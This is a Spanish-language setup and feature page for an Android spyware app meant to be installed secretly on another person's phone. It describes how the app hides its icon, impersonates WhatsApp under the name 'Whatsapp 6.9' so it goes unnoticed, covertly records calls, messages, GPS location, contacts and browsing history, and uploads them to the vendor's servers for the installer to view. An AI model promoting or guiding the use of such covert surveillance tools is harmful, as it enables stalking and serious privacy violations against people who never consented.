Como usar y activar la aplicación:

1:: Descargue e instale la aplicación en el dispositivo Android que desea monitorear.  (Descarga aquí)
2:: Abra la aplicación e introduzca un usuario y un password, los cuales deberá recordar para iniciar sesión en la web.
(En el caso de ya disponer de una cuenta en nuestro sitio, introduzca el usuario y password de su cuenta)
3:: Presione el botón Activar y espere a que se complete  el proceso de validación y activación.
4:: Si todo salio correctamente, se desplegara un mensaje de validación exitosa. Ahora usted podrá comenzar a utilizar el servicio.
Ingresando a nuestra web e iniciando sesión, accederá a un panel de usuario, en el cual podrá visualizar todo lo que ocurre en el dispositivo.
Si desea registrar nuevos dispositivos utilizando la misma cuenta de usuario, debe seguir el mismo procedimiento. (En vez de crear un nuevo usuario, utiliza el que ya tiene)
 

IMPORTANTE:
* Luego de finalizada la activación, el icono de la aplicación se oculta automáticamente del menú principal.
* El icono solo podrá ser visible si se accede a la lista de aplicaciones descargadas del dispositivo.
* Para pasar por inadvertida su presencia, la aplicación se almacena con el nombre e icono de Whatsapp.
* Para desinstalar, se debe eliminar la aplicación "Whatsapp 6.9" de la lista de aplicaciones descargadas.
* Se puede desactivar la aplicación de forma remota desde el panel de usuario.
* Si se desea reinstalar o reactivar, se debe desinstalar previamente la aplicación, realizando lo mencionado anteriormente.

 

Como funciona?

:: La aplicación reside oculta en el sistema y registra todo lo que ocurre en el dispositivo (llamadas, mensajes de texto, coordenadas gps, agenda de contactos, historial web, etc.). En ningún momento la persona que usa el dispositivo notara que la aplicación existe, ya que luego de activarse se elimina el icono del menú, esto permite usar la aplicación en secreto.
:: Cada vez que la aplicación logra capturar un volumen considerable de información, se conecta con nuestros servidores y envía la información automáticamente a su cuenta de usuario en el sitio. (NO es necesario que el dispositivo disponga constantemente conexion a Internet)
:: Usted cada vez que acceda a su cuenta de usuario podrá ver en detalle toda la información recibida, hacer búsquedas, aplicar filtros, etc.
:: Usted tendrá la posibilidad de desinstalar la aplicación de forma remota (a través de la web) cuando lo desee.